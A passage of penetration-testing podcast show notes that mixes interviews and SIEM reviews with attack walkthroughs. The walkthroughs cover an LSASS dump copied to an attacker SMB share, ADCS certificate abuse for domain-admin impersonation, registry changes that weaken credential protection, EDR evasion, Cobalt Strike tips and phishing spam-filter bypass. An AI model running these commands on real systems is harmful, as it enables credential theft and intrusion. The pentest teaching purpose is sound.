    # Windows system: tell your Windows system to trust the victim host you're about to PS into: winrm set winrm/config/client @{TrustedHosts="VICTIM-SERVER"} # Windows system: PowerShell into the victim system Enter-PSSession -computername -Credential domain.com\pwneduser # Kali system: create and share a folder with nanodump.exe in it: sudo mkdir /share sudo python3 /opt/impacket/examples/smbserver.py share /share -smb2support # Victim system: copy nanodump from Kali box to VICTIM-SERVER copy \\YOUR.KALI.IP.ADDRESS\share\nano.exe c:\windows\temp\ # Victim system: get the PID for lsass.exe tasklist /FI "IMAGENAME eq lsass.exe" # Victim system: use nano to do the lsass dump c:\windows\temp\nano.exe --pid x --write c:\windows\temp\toteslegit.log # Victim system: Get the log back to your Kali share copy c:\windows\temp\toteslegit.log \\YOUR.KALI.IP.ADDRSS\share\ # Kali system: "fix" the dump and extract credz with mimikatz! sudo /opt/nanodump/restore_signature.sh winupdates1.log sudo python3 -m pypykatz lsa minidump toteslegit.log -o dump.txt

    Enjoy delicious passwords and hashes in the dump.txt file!


    7MS #507: Interview with Matthew Warner of Blumira Feb 09, 2022

    Today's featured interview is with Matthew Warner, CTO and co-founder of Blumira. We had a great chat about why out-of-the-box Windows logging isn't super awesome, "free" ways to get logging turned up to 11 (Microsoft's audit policy recommendations, sysmon, sysmon modular), as well as how to get better logging in hard-to-reach places like Kerberos. Be sure to also check out Blumira's resources on detecting Kerberoasting and simplifying Windows log collection and ongoing management with Poshim. And please check out the Webinar we did together which demonstrates some common pentest attacks - and how Blumira can detect them!


    7MS #506: Tales of Pentest Pwnage - Part 32 Feb 03, 2022

    Today's my favorite tale of pentest pwnage (again)! This time we're talking about sAMAccountName spoofing specifically. We also talk about my always-under-construction list of things I try early in a pentest for maximum pwnage:

    • Run PingCastle
    • Do the SharpHound/BloodHound dumps
    • Run the DHCP poisoning module of Responder
    • Check the ms-DS-MachineAccountQuota value in the domain - if its at the default (10), then any user can add machines to the domain.
    Why is the ability to add machines to the domain important? Because in the case of the sAMAccountName spoofing, if you have a non-domain-joined machine like I do, you need the ability to add a computer object to the domain. Check the Pentestlab.blog article for more info, but essentially, if you have an unpatched domain controller and the ability to add computer objects to the domain, you can pull off the attack. The article goes into crazy good technical detail, and here's my not-so-technical explanation:

    If I was on a pentest, and the DC was called 7MS-DC01, and I could join a machine to the domain (which as a reminder - ANY user can do if the machine quota value is at the default value of 10), I could rename that machine account to be 7MS-DC01 without the dollar sign, request a TGT for the domain controller's account, then restore the machine name back to what it was before. Now, because the TGT is stored in memory, we can use the S4U2self Kerberos extension to request a service ticket using a domain admin account. And because the original ticket belong to the 7MS-DC01 machine name which now doesn't exist, Kerberos will look for 7MS-DC01$ and will issue the ticket for the requested service.

    I might've butchered that explanation mom, but I tried my best!

    TLDL/TLDR: find and exploit these unpatched domain controllers with noPac. Enjoy!


    7MS #505: Pwning Wifi PSKs and PMKIDs with Bettercap Jan 28, 2022

    Hey friends, today I talk about the old school way I used to pwn wifi networks, then a more modern way, and then my new favorite way (spoiler alert: I use Bettercap).


    7MS #504: Monitoring All Your Cloud Thingies with UptimeRobot Jan 20, 2022

    Hey friends, today we're talking about how to monitor all your cloud thingies (Web servers, mail servers, etc.) with UptimeRobot. And I'm sharing some fun tips to monitor your internal thingies as well - without the use of any extra agent software.


    7MS #503: First Impressions of Brute Ratel Jan 12, 2022

    Today's episode is all about Brute Ratel, a command and control center that is super cool, quick to setup, and much easier to use (IMHO) than Cobalt Strike. I also talk specifically about some of my favorite command line features, how slick and simple lateral movement is, and the "killer feature" that makes me giggle like the bad guy from Sonic the Hedgehog.

    In the tangent department, Mrs. 7MS makes an appearance via phone and I bore you to tears about my continued iFly addiction.


    7MS #502: Building a Pentest Lab in Azure Jan 05, 2022

    Happy new year friends! Today I share the good, bad, ugly, and BROKEN things I've come across while migrating our Light Pentest LITE training lab from on-prem VMware ESXi to Azure. It has been a fun and frustrating process, but my hope is that some of the tips in today's episode will save you some time/headaches/money should you setup a pentesting training camp in the cloud.

    Things I like

    • No longer relying on a single point of failure (Intel NUC, switch, ISP, etc.)

    • You can schedule VMs to auto-shutdown at a certain time each day, and even have Azure send you a notification before the shutdown so you can delay - or suspend altogether - the operation

    Things I don't like

    • VMs are by default (I believe) joined to Azure AD, which I don't want. Here's how I got machines unjoined from Azure AD and then joined to my pwn.town domain:
    dsregcmd /leave Add-Computer -DomainName pwn.town -Restart
    • Accidentally provision a VM in the wrong subnet? The fix may be rebuilding the flippin' VM (more info in today's episode).

    • Just about every operation takes for freakin' ever. And it's confusing because if you delete objects out of the portal, sometimes they don't actually disappear from the GUI for like 5-30 minutes.

    • Using backups and snapshots is archaic. You can take a snapshot in the GUI or PowerShell easy-peasy, but if you actually want to restore those snapshots you have to convert them to managed disks, then detach a VM's existing disk, and attach the freshly converted managed disks. This is a nightmare to do with PowerShell.

    • Deleting data is a headache. I understand Azure is probably trying to protect you against deleting stuff and not being able to get it back, but they night a right-click > "I know what I'm doing, DELETE THIS NOW" option. Otherwise you can end up in situations where in order to delete data, you have to disable soft delete, undelete deleted data, then re-delete it to actually make it go away. WTH, you say? This doc will help it make more sense (or not).

    Things that are broken

    • Promiscuous mode - just plain does not work as far as I can tell. So I can't do protocol poisoning exercises with something like Inveigh.

    • Hashcat - I got CPU-based cracking working in ESXi by installing OpenCL drivers, but try as I may, I cannot get this working in Azure. I even submitted an issue to the hashcat forums but so far no replies.

    On a personal note, it has been good knowing you because I'm about to spend all my money on a new hobby: indoor skydiving.


    7MS #501: Tales of Pentest Pwnage - Part 31 Dec 29, 2021

    Today we're closing down 2021 with a tale of pentest pwnage - this time with a path to DA I had never had a chance to abuse before: Active Directory Certificate Services! For the full gory details on this attack path, see the Certified Pre-Owned paper from the SpecterOps crew. The TLDR/TLDL version of how I abused this path is as follows:

    • Grab Certi
    • Grab Certify

    Run Certify.exe find /vulnerable, and if you get some findings, review the Certified Pre-Owned paper and the Certify readme file for guidance on how to exploit them. In my case, the results I got from Certify showed:

    msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT

    Reading through the Certify readme, I learned "This allows anyone to enroll in this template and specify an arbitrary Subject Alternative Name (i.e. as a DA)." The Certify readme file walks you through how to attack this config specifically, but I had some trouble running all the tools from my non-domain-joined machine. So I used a combination of Certify and Certi to get the job done. First I started on Kali with the following commands:

    sudo python3 /opt/impacket/examples/getTGT.py 'victimdomain.domain/MYUSER:MYPASS' export KRB5CCNAME=myuser.cache sudo python3 ./certi.py req 'victimdomain.domain/MYUSER@FQDN.TO.CERT.SERVER' THE-ENTERPRISE-CA-NAME -k -n --alt-name DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE --template VULNERABLE-TEMPLATE NAME

    From that you will get a .pfx file which you can bring over to your non-domain-joined machine and do:

    rubeus.exe purge rubeus.exe asktgt /user:DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE /certificate:DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE@victim.domain.pfx /password:PASSWORD-TO-MY-PFX-FILE /domain:victimdomain.domain /dc:IP.OF.DOMAIN.CONTROLLER

    And that's it! Do a dir \\FQDN.TO.DOMAIN.CONTROLLER\C$ and enjoy your new super powers!


    7MS #500: Interview with John Strand Dec 22, 2021

    HAPPY 500 EPISODES, FRIENDS! That's right, 7MS turned 5-0-0 today, and so we asked John Strand of Black Hills Information Security to join us and talk about all things security, including the John/BHIS superhero origin story, the future of pentesting, the (perceived) cybersecurity talent shortage, how to get started with good security practices in your organization, and more! P.S. check out John's first visit to the show here.


    7MS #499: Desperately Seeking a Super SIEM for SMBs - Part 6 Dec 16, 2021

    Today we have some cool updates on this SIEM-focused series we've been doing for a while. Specifically, I want to share that one of these solutions can now detect three early (and important!) warning signs that bad things are happening in your environment:

    • ASREPRoasting

    • WDigest flag getting flipped (reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1)

    • Restricted admin mode getting enabled (reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f) - see n00py's blog for more info


    7MS #498: Securing Your Mental Health - Part 2 Dec 13, 2021

    Hi everybody, today we're continuing a series we started way back in June called Securing Your Mental Health. Today I talk about some easy and relatively cheap things I'm doing to try and shutdown negative thoughts, punch imposter syndrome in the face, and be an overall happier and more positive person.


    7MS #497: The Stress and Satisfaction of Offering Live Security Training Dec 02, 2021

    Hey friends, today I'm giving you a peek behind the curtain of our Light Pentest LITE training to talk about the software/hardware we use to make it sing, the growing pains - and OMG(!) moments - that forced us to build in more infrastructure redundancy, and the cool (and expensive!) cloud options we're considering to offer a self-paced version of the course.


    7MS #496: Tales of Pentest Pwnage - Part 30 Nov 24, 2021

    Today's tale of pentesting has a bunch of tips to help you maximize your pwnage, including:

    • The new Responder DHCP poisoning module
    • All the cool bells and whistles from CrackMapExec which now include new lsass-dumping modules!
    • Speaking of lsass dumping, here's a new trick that works if you have Visual Studio installed (I bet it will be detected soon).

    I close out today's episode with a story about how my Cobalt Strike beacons got burned by a dating site!


    7MS #495: Desperately Seeking a Super SIEM for SMBs - Part 5 Nov 17, 2021

    Today we continue our SIEM/SOC evaluation series with a closer look at one particular managed solution and how it fared (very well) against a very hostile environment: the Light Pentest LITE pentesting course! Spoiler alert: this solution was able to detect:

    • RDP from public IPs
    • Password spraying
    • Kerberoasting
    • Mimikatz
    • Recon net commands
    • Hash dumping
    • Hits on a "honey domain admin" account
    • Users with non-expiring passwords
    • Hits on the SSH/FTP/HTTP honeypot

    7MS #494: Interview with Josh Burnham of Liquid Web Nov 10, 2021

    7MS #493: 7MOIST - Part 2 Nov 04, 2021

    Hey, remember back in episode #357 where we introduced 7MOIST (7 Minutes of IT and Security Tips)? Yeah, me neither :-). Anyway, we're back with the second edition of 7MOIST and have some cool pentesting and general IT tips that will hopefully make your life a little awesome-r:

    • Stuck on a pentest because EDR keeps gobbling your payloads? SharpCradle might just save the day!

    • CrackMapExec continues to learn new awesome tricks - including a module called slinky that plants hash-grabbing files on shares you have write access to!

    • Browsing 17 folders deep in Windows Explorer and wish you could just pop a cmd.exe from right there? You can! Just click into the path where you're browsing, type cmd.exe, hit Enter and BOOM! Welcome to a prompt right at that folder!


    7MS #492: Tales of Pentest Pwnage - Part 29 Oct 28, 2021

    Hello friends! We're long overdue for a tale of pentest pwnage, and this one is a humdinger! It's actually kind of three tales in one, focusing on pentesting wins using:

    • Manual "open heart surgery" on the root of the Active Directory domain
    • The new totally rad DHCP poisoning module of Responder
    • An opportunity to abuse GPOs with SharpGPOAbuse (P.S. we talked about this tool about a year ago in episode 441)

    7MS #491: Interview with Louis Evans of Arctic Wolf Oct 20, 2021

    Today we're joined by Louis Evans of Arctic Wolf to talk about all things cyber insurance, including:

    • History on cyber insurance - who's buying it, what it does and doesn't cover, and when it started to be something you didn't want to leave home without

    • What are insurance companies asking/demanding of customers before writing a cyber insurance policy?

    • What basic things organizations can do to reduce malware/ransomware incidents (whether they are considering a cyber insurance policy or not)?

    • How do I evaluate the various insurance carriers out there and pick a good one?


    7MS #490: Desperately Seeking a Super SIEM for SMBs - Part 4 Oct 13, 2021

    Hey friends! Today we're going to recap the SIEM/SOC players we've evaluated so far (Arctic Wolf, Elastic, Sumo Logic, Milton Security) and then talk about a new contender that was brought to our attention: Blumira (not a sponsor, but I'm really digging what I'm seeing/hearing/experiencing thus far)!


    7MS #489: Ping Castle Oct 06, 2021

    Today we're talking about Ping Castle (not a sponsor), an awesome tool for enumerating tons of info out of your Active Directory environment and identifying weaknesses, misconfigurations and paths to escalation! It's wonderful for both red and blue teamers.

    Some of Ping Castle's cool features include being able find:

    • Kerberoastable and ASREPRoastable users
    • Plain text passwords lingering in Group Policy Objects
    • Users with never-expiring passwords
    • Non-supported versions of Windows
    • Machines configured with unconstrained delegation
    • Attack and escalation paths to Domain Admins

    7MS #488: How to Succeed in Business Without Really Crying - Part 10 Sep 29, 2021

    Today we continue our series focused on building a security consultancy and talk about:

    • A phishing campaign that went off the rails, and lessons learned from it
    • First impressions of an awesome tool to help add MFA to your Active Directory (not a sponsor)
    • A tangent story about how my wife brought some thieves to justice!

    7MS #487: Light Pentest eBook Announcement! Sep 28, 2021

    Hey friends! Today I've got some exciting personal/professional news to share: our Light Pentest eBook - which is a practical, step-by-step playbook for internal network penetration testing - is now available for purchase!

    Note: this eBook and the Light Pentest LITE training are two separate things, but do cover some of the same topics.

    The Light Pentest eBook covers:

    • Grabbing and analyzing packet captures
    • Abusing insecure network protocols
    • Exploiting (the lack of) SMB signing
    • Capturing, cracking and passing hashes
    • Locating high-value targets with DNS zone transfers
    • Exploiting vulnerable Group Policy Objects
    • Scraping screenshots of Web interfaces with WitnessMe
    • Finding and cracking "Kerberoastable" and "ASREPRoastable" Active Directory accounts
    • Dumping, passing and cracking hashes from domain controllers

    The Light Pentest eBook is available now for $7.77, and by purchasing it you are entitled to all future editions/revisions going forward.


    7MS #486: Interview with Matt Quammen of Blue Team Alpha Sep 22, 2021

    Today our good buddy Joe Skeen and I virtually sit down with Matt Quammen of Blue Team Alpha to talk about all things incident response! Topics covered include:

    • Top 5 things to do and not do during ransomware event
    • Challenges when responding to ransomware events
    • Opportunities to break into infosec/IR
    • The value of tabletop exercises, and some great ideas for conducting your own
    • Incident response stress and success stories
    • Cyber insurance - worth it or not?

    7MS #485: Interview with Christopher Fielder Sep 15, 2021

    Today our friend Christopher Fielder from Arctic Wolf is back for an interview four-peat! We had a great chat about making sense of vendor alphabet soup terms (like SIEM, SOC, EDR/MDR/XDR, ML, AI and more!), optimizing your SOC to "see" as much as possible, tackling vendor/customer communication problems, and simplifying security product pricing to make purchases less stressful for customers!

    And don't forget to check out Christopher's first, second and third interviews with 7MS.


    7MS #484: Desperately Seeking a Super SIEM for SMBs - Part 3 Sep 08, 2021

    Today we're continuing our series called Desperately Seeking a Super SIEM for SMBs - this time with a focus on a new contender in our bake-off: Perch Security!

    It might help you to go back and take in part 1 and part 2, but today we're focusing on the first experience I had chatting with the sales/technical folks at Perch. TLDL: I really liked a lot of things I was hearing and seeing. Pros (perceived) include:

    • Simple pricing model
    • Easy to use dashboard
    • Cool "marketplace" of integrations you can add to your instance and start getting alerts for
    • Nice API integration that seemed pretty simple to use - and that covers a lot of different cloud products and services
    • Ticket dashboard looked straightfoward to use and interpret
    • Can quickly add IPs/subnets that you don't want to monitor, if appropriate

    7MS #483: Desperately Seeking a Super SIEM for SMBs - Part 2 Sep 01, 2021

    Today we continue our series we started recently (part 1 is here about finding a super SIEM for SMBs. Specifically I have some updates on (and frustrations with) Arctic Wolf, Elastic, Milton Security and Perch Security.

    Here's the TLDL version:

    Arctic Wolf They remain a strong contender in my bake-offs. They also could tick several boxes for an org as they offer continuous internal/external vulnerability scanning as well as a managed SOC. (And yes, I'm probably a tiny bit biased because I know a bunch of AWN's engineers and like the product)

    Elastic I've loved my interactions with the sales folks and engineers at Elastic. My initial trial had some technical speed bumps (which Elastic helped me remedy). I eventually did get some Elastic agents enrolled on endpoints in my lab. However, now that I'm up and running (and admittedly I should go through the Webinars and online training), I'm feeling overwhelmed. There's a jillion menus and submenus to explore. I feel like I've been given a high-performance sports car but completely lack the knowledge on how to make the most of it. I'll keep Elastic in my back pocket, but I don't think I can feel comfortable handing this dashboard over to a SMB IT/security staff and have them run with it.

    Milton Security A few weeks ago I had my first ever sales call with this group, and liked a lot of what I heard. They're up front about being a threat-hunt-as-a-service organization and they're not looking to partner with just any customer. The way they bundle sources of data (for the sake of pricing) makes sense to me, and although I haven't seen a formal quote from them yet, I think they will be reasonably priced when compared to some of the "big box" solutions.

    Perch Security After part 1 of this series, several of you pinged me and said to check out Perch Security. I'm very excited to connect with them but had a tough time getting someone to respond to my inquires (two weeks to be exact). Good news is I've got a call scheduled with them this week and am anxious to share what I learn about Perch on our next episode in this series.


    7MS #482: Creating Kick-Butt Credential-Capturing Phishing Campaigns - Part 3 Aug 26, 2021

    Today we're continuing our discussion on phishing campaigns - including a technical "gotcha" that might redirect your phishing emails into a digital black hole if you're not careful!

    As I mentioned last week, I've been heavy into spinning up and tearing down phishing campaigns, so I finally got around to documenting everything in episode 481.

    This week I ran into a bizarre issue where test phishes to myself suddenly disappeared from my Outlook altogether! After chatting with some folks on Slack I did a message trace in the Exchange Admin Center under:

    • Mail flow > Message Trace > Start a trace then make the Sender field be the user you're sending phishing emails from. That showed me that my phishes were being quarantined!

    To get around the quarantine, I went into Mail flow > Rules and then created a new rule with the following properties:

    • Apply this rule if > The sender's domain is > yourphishingdomain.com

    Then under Do the following:

    • Set the spam confidence level (SCL) to...Bypass spam filtering

    Under And, click the drop-down and choose:

    • Modify the message properties...set a message header...X-MS-Exchange-Organization-BypassClutter

    Then click where it says Enter text and change header value to True and click OK.


    7MS #481: Creating Kick-Butt Credential-Capturing Phishing Campaigns - Part 2 Aug 19, 2021

    Today we're revisiting how to make a kick-butt cred-capturing phishing campaign with Gophish, Amazon Lightsail, LetsEncrypt, ExpiredDomains.net and a special little extra something that makes creating phishing landing pages waaaaaaayyyyyyyyyy easier!

    For some quicker review, you can check out part 1 and also the complementary YouTube video, but I wanted to revisit this kick-butt process and update a few items:

    First, this SingleFile extension is amaaaaaaaazing for making phishing landing pages with ease!

    The process to get GApps to let you generate an app-specific password for using with GoPhish is kinda annoying. The steps below should get you going:

    • After domain registration, log into admin.google.com or click Manage Workspace button at checkout.

    • At the next screen click Workspace Admin Console. Sign in with the person you’ll be spoofing from, and the temporary password emailed to your backup email account during checkout.

    • In the search bar search for Less Secure Apps, choose Allow users to manage their access to less secure apps.

    • Now, in the upper right, hit Manage Your Google Account.

    • Under Security, click Protect your account and click Add phone number. Finish that process, then click Continue to your Google account.

    • Back at the main admin page, under Less secure app access, click Turn on access (not recommended).

    • At the next screen click Allow less secure apps: ON

    • Back at the main screen, click 2-Step Verification and set it to On.

    • Back at the main screen again, a new option called App passwords should be there. Click it. Choose to generate a custom name like LOL and then then an app password will appear. Write it down as it only appears once!

    Finally, a quick reference for getting your LetsEncrypt cert to work with GoPhish. Get your LetsEncrypt cert generated, and then forge a .crt and .key file to use with GoPhish:

    cp /etc/letsencrypt/live/YOUR-DOMAIN/fullchain.pem ./domain.crt cp /etc/letsencrypt/live/YOUR-DOMAIN/privkey.pem ./domain.key

    Now go into the GoPhish .json config file and change the cert_path and key_path to the ones you just generated, and change use_tls to TRUE on both places in the config as well.


    7MS #480: Desperately Seeking a Super SIEM for SMBs Aug 12, 2021

    Today we're talking about the SIEM bake-off for SMBs that we've recently embarked on. We're currently evaluating several solutions - either for customer-facing purposes, internal kick-the-tires fun, or both.

    Candiates include:

    • Arctic Wolf
    • Elastic
    • Milton Security
    • Protocol46
    • Sumo Logic

    First we're starting by running each vendor through a series of questions, then likely following up with a demo where we'll run some technical tests and simulated hacking to see which vendor or vendors reign supreme!


    7MS #479: A Prelude to PwnTown Aug 06, 2021

    Hey friends, today we're talking about a new security training offering 7MinSec has created called Light Pentest LITE - Live Interactive Training Experience. It's a 3-day course (with each class session being 3 hours long) consisting of live (via Zoom), hands-on, instructor-led sessions that are focused on teaching you how to find, exploit and defend against common Active Directory weaknesses!

    Check out today's episode to learn more and get a hint for an OSINT exercise that will get you 10% off of a Light Pentest LITE training session!


    7MS #478: Password Cracking in the Cloud - Part 4 Jul 29, 2021

    Hey friends, today we're continuing our discussion of password cracking by sharing some methodology that has helped us get a high cred yield, and some tips on taking cracked passwords from multiple sources and Frankensteining them into a beautiful report for your customer.

    For some background, when 7MS started as a biz, we used to crack passwords in Paperspace but invested in an on-prem cracking rig a few years ago. That rig has been flipping sweet, but had some heating issues which prompted me to send the system in for warranty and use an awesome cracking rig in AWS in the meantime.

    Whether you're cracking locally or in the cloud, here's a quick methodology that has cracked many a hash for us:

    • Do a straight-up hashcat crack against the PwnedPasswords list (at time of this writing I don't have a good source for the cracked versions of these passwords. I used to grab them at hashes.org. Anybody got an alternative?

    • Do a straight-up hashcat crack through the RockYou2021 list

    • Run the hatecrack methodology, including the quick crack, the quick crack with rules (I'm partial to OneRuleToRuleThemAll), and brute-forcing all 1-8 character passwords

    Once I'm ready to wrap up all the cracked passwords and put them in a nice shiny report for the customer, I do the following (using hashcombiner and pipal):

    # Run hash_combiner on hashcat’s pot file and write results to a file python /opt/hc/hash_combiner.py user_hash /opt/hashcat/hashcat.potfile > /tmp/round1.txt # Run hash_combiner on hatecrack’s pot file and write results to a file python /opt/hc/hash_combiner.py user_hash /opt/hatecrack/hashcat.pot > /tmp/round2.txt # Cat the two files together into a third file cat /tmp/round1.txt /tmp/round2.txt > /tmp/round3.txt # Sort and de-dupe the third file cat /tmp/round3.txt | sort -uf > /tmp/nice-and-clean.txt # Take just the passwords out of the “nice and clean” output cut -d ':' -f 2 /tmp/nice-and-clean.txt > /tmp/pipal-temp.txt # Score the passwords using pipal /opt/pipal/pipal.rb /tmp/pipal-temp.txt > /tmp/pip-final.txt

    Now you've got a nice-and-clean.txt list of users and their cracked passwords, as well as the pip-final.txt with deeper analysis of cracked passwords, their commonalities, etc.


    7MS #477: Cobalt Strike for Newbs Jul 21, 2021

    Today we're talking about Cobalt Strike for newbs - including how to get it up and running, as well as some tools that will help you generate beacons while evading EDR at the same time!

    Some helpful things mentioned in today's episode:

    • Wherever you spin up your CS instance, it's probably a good idea to lock down the firewall to only specific IPs. With Digital Ocean, I found this article helpful.

    • When generating CS listeners, the C2Concealer from FortyNorth helped me get malleable C2 profiles generated while creating a LetsEncrypt cert at the same time!

    • My CS beacons kept getting gobbled by AV, but the following resources helped me get some stealthy ones generated: Artifact Kit, PEzor and ScareCrow. Here's a specific ScareCrow example that flew under the EDR radar:

    Scarecrow -I myrawshellcode.bin -etw -domain www.microsoft.com

    • PowerUpSQL is awesome for finding servers where you can run stored procedures to send your attacking box a priv'd hash to pass/capture/crack. Check out this presentation on PowerUpSQL to find vulnerable targets, then use mssql_ntlm_stealer module in Metasploit to have fun with the account hashes. Be sure to set your domain when configuring the Metasploit module!

    • When trying to pop an SMB shell with relay tools, I've had problems recently with those attempts being stopped by defensive tools. Then I found this gem which talks about tweaking smbexec.py to evade AV. It worked a treat!

    • When you use MultiRelay, I had no idea that it includes an upload function so you can simply upload your beacon.exe from a SYSTEM shell and fire it right from a command line. Cool!

    • Once my beacons started firing around the pentest environment, I temporarily allowed all IPs to talk to my Digital Ocean box - just because the IP I grabbed from a "what is my IP?" Google search didn't always match the actual beacons that called home. Once the beacon connectivity was established, I tweaked the beacon firewall rules to just let certain IPs in the door.

    • This Cobalt Strike Extension Kit was FREAKING sweet for adding "right click > do awesome stuff" functionality to CS like dump hashes, search for Kerberoastable accounts, setup persistence, etc.

    • Got a SYSTEM level shell but need to abuse a DA's privs? Tell the beacon to pull back a list of running processes, then click one (like explorer.exe) running under a DA's account and then impersonate it to add your account to the DA group!

    • Having issues dumping LSASS? This article from Red Canary gives you some great ideas to do it in a way that doesn't make AV throw a fit!

    • Trying to RDP using PtH? This article will help you out. And if you get warnings about not being able to RDP in because of some sort of login restriction, try adjusting this reg key with CME:

    cme smb 10.1.2.3 -u Administrator -H THE-HASH-YOU-CAPTURED -x 'reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f'


    7MS #476: Tales of Pentest Pwnage - Part 28 Jul 16, 2021

    **STOP!** If you didn't listen to [last week's episode](https://7ms.us/7ms-475-tales-of-internal-network-pentest-pwnage-part-27/) you might want to, since this was a two-part tale of pwnage. Either way I'll get you up to speed and talk about why this was (of course) one of my favorite pentests ever.


    7MS #475: Tales of Internal Network Pentest Pwnage - Part 27 Jul 08, 2021

    Yeahhhhhh! Today's another fun tale of pentest pwnage, including:

    • The importance of starting your pentest with an AD account that actually has access to...ya know...stuff

    • The importance of starting your pentest plugged into a network that actually has...you know...systems connected to it!

    • This BHIS article is awesome for finding treasures in SMB shares

    • PowerUpSQL audits are a powerful way to get pwnage on a pentest - check out this presentation for some practical how-to advice

    • IPMI/BMCs often have weak creds and/or auth bypasses so don't forget to check for them. Rapid7 has a slick blog on the topic.

    • Don't forget to check for vulnerable VMWare versions because some of them have major vulnerabilities


    7MS #474: Password Cracking in the Cloud - Part 3 Jun 30, 2021

    Hey friends! Today we're dusting off an old mini-series about password cracking in the cloud (check out part 1 and part 2) and sharing some awesome info on building a monster of a cracking rig in AWS!

    One reason we haven't talked about password cracking in the cloud in a while is because back in winter of 2019 I built baby's first password cracking. Unfortunately, this week, Hashy (the name I gave to the rig) is overheating, and GPUs are impossible to find, so what's a pentester to do?

    Well, in today's episode I talk about this article from Sevnx which walks you through building a virtual password-cracking beast in the cloud. The article (complemented by a sweet video) will get you running in short order.

    WARNING: running this instance is super expensive (the author warns the instance would cost ~$9k/month if you left it run continuously).

    The steps are pretty straightforward, but between reboots I found that hashcat acted all wonky. Luckily, the article addresses that with this great tip:

    Pro tip: Save the Cuda download somewhere. If you ever turn your cracker off and get errors running hashcat when you turn it back on, re-run the install line. We think AWS sometimes refreshes the drivers or something and hashcat doesn't like it very much.

    If you need help installing one of my fave tools, hatecrack check out my password cracking in the cloud gist. Also, our buddy Joe pointed me towards a utility called duplicut to help de-dupe large password-cracking wordlists.

    Once the AWS instance is setup, what kind of stats do we get out of this demon? Here's the result of hashcat -b:

    Hashmode: 0 - MD5 Speed.#1.........: 55936.1 MH/s (47.79ms) @ Accel:32 Loops:1024 Thr:1024 Vec:8 Speed.#2.........: 55771.4 MH/s (47.94ms) @ Accel:32 Loops:1024 Thr:1024 Vec:8 Speed.#3.........: 55827.0 MH/s (47.88ms) @ Accel:32 Loops:1024 Thr:1024 Vec:8 Speed.#4.........: 55957.7 MH/s (47.78ms) @ Accel:32 Loops:1024 Thr:1024 Vec:8 Speed.#*.........: 223.5 GH/s Hashmode: 100 - SHA1 Speed.#1.........: 17830.1 MH/s (75.08ms) @ Accel:16 Loops:1024 Thr:1024 Vec:1 Speed.#2.........: 17774.0 MH/s (75.21ms) @ Accel:16 Loops:1024 Thr:1024 Vec:1 Speed.#3.........: 17780.9 MH/s (75.26ms) @ Accel:16 Loops:1024 Thr:1024 Vec:1 Speed.#4.........: 17795.6 MH/s (75.22ms) @ Accel:16 Loops:1024 Thr:1024 Vec:1 Speed.#*.........: 71180.6 MH/s Hashmode: 1400 - SHA2-256 Speed.#1.........: 7709.9 MH/s (86.84ms) @ Accel:8 Loops:1024 Thr:1024 Vec:1 Speed.#2.........: 7718.3 MH/s (86.75ms) @ Accel:8 Loops:1024 Thr:1024 Vec:1 Speed.#3.........: 7710.4 MH/s (86.75ms) @ Accel:8 Loops:1024 Thr:1024 Vec:1 Speed.#4.........: 7694.4 MH/s (87.02ms) @ Accel:8 Loops:1024 Thr:1024 Vec:1 Speed.#*.........: 30833.0 MH/s Hashmode: 1700 - SHA2-512 Speed.#1.........: 2399.8 MH/s (69.70ms) @ Accel:8 Loops:256 Thr:1024 Vec:1 Speed.#2.........: 2401.1 MH/s (69.68ms) @ Accel:8 Loops:256 Thr:1024 Vec:1 Speed.#3.........: 2397.3 MH/s (69.78ms) @ Accel:8 Loops:256 Thr:1024 Vec:1 Speed.#4.........: 2400.3 MH/s (69.70ms) @ Accel:8 Loops:256 Thr:1024 Vec:1 Speed.#*.........: 9598.5 MH/s Hashmode: 22000 - WPA-PBKDF2-PMKID+EAPOL (Iterations: 4095) Speed.#1.........: 866.5 kH/s (94.23ms) @ Accel:16 Loops:256 Thr:1024 Vec:1 Speed.#2.........: 866.7 kH/s (94.21ms) @ Accel:16 Loops:256 Thr:1024 Vec:1 Speed.#3.........: 865.6 kH/s (94.30ms) @ Accel:16 Loops:256 Thr:1024 Vec:1 Speed.#4.........: 866.7 kH/s (94.20ms) @ Accel:16 Loops:256 Thr:1024 Vec:1 Speed.#*.........: 3465.5 kH/s Hashmode: 1000 - NTLM Speed.#1.........: 102.2 GH/s (26.05ms) @ Accel:32 Loops:1024 Thr:1024 Vec:8 Speed.#2.........: 102.3 GH/s (26.05ms) @ Accel:32 Loops:1024 Thr:1024 Vec:8 Speed.#3.........: 102.2 GH/s (26.07ms) @ Accel:32 Loops:1024 Thr:1024 Vec:8 Speed.#4.........: 102.3 GH/s (26.04ms) @ Accel:32 Loops:1024 Thr:1024 Vec:8 Speed.#*.........: 409.0 GH/s Hashmode: 3000 - LM Speed.#1.........: 41104.7 MH/s (64.74ms) @ Accel:512 Loops:1024 Thr:64 Vec:1 Speed.#2.........: 40216.5 MH/s (66.11ms) @ Accel:512 Loops:1024 Thr:64 Vec:1 Speed.#3.........: 40507.3 MH/s (65.89ms) @ Accel:512 Loops:1024 Thr:64 Vec:1 Speed.#4.........: 39181.4 MH/s (68.13ms) @ Accel:512 Loops:1024 Thr:64 Vec:1 Speed.#*.........: 161.0 GH/s Hashmode: 5500 - NetNTLMv1 / NetNTLMv1+ESS Speed.#1.........: 55861.0 MH/s (47.87ms) @ Accel:32 Loops:1024 Thr:1024 Vec:2 Speed.#2.........: 55864.3 MH/s (47.87ms) @ Accel:32 Loops:1024 Thr:1024 Vec:2 Speed.#3.........: 55519.4 MH/s (47.98ms) @ Accel:32 Loops:1024 Thr:1024 Vec:2 Speed.#4.........: 55826.6 MH/s (47.89ms) @ Accel:32 Loops:1024 Thr:1024 Vec:2 Speed.#*.........: 223.1 GH/s Hashmode: 5600 - NetNTLMv2 Speed.#1.........: 3968.0 MH/s (84.37ms) @ Accel:4 Loops:1024 Thr:1024 Vec:1 Speed.#2.........: 3968.1 MH/s (84.38ms) @ Accel:4 Loops:1024 Thr:1024 Vec:1 Speed.#3.........: 3965.6 MH/s (84.38ms) @ Accel:4 Loops:1024 Thr:1024 Vec:1 Speed.#4.........: 3967.8 MH/s (84.37ms) @ Accel:4 Loops:1024 Thr:1024 